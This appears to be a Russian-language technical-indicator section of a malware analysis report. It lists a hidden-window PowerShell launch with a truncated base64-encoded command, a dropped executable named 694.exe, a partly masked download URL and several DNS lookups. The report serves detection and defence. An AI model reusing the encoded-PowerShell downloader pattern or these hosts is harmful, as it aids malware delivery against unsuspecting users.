Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAG4AegB1AGMAeQB0AHcAdwBuAGkAZQA9ACcATgBnAGIAcwB1AG8AZQBuAHUAeQBmAHYAdwAnADsAJABWAHgAYwB3AGUAaQBuAG...
- %HOMEPATH%\694.exe
- %HOMEPATH%\694.exe
- http://on#####cordradio.com/wp-admin/54y4jvo94/
- DNS ASK on#####cordradio.com
- DNS ASK be####in-shoes.com
- DNS ASK sm#######snisinformatika.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAG4AegB1AGMAeQB0AHcAdwBuAGkAZQA9ACcATgBnAGIAcwB1AG8AZQBuAHUAeQBmAHYAdwAnADsAJABWAHgAYwB3AGUAaQBuAG...' (со скрытым окном)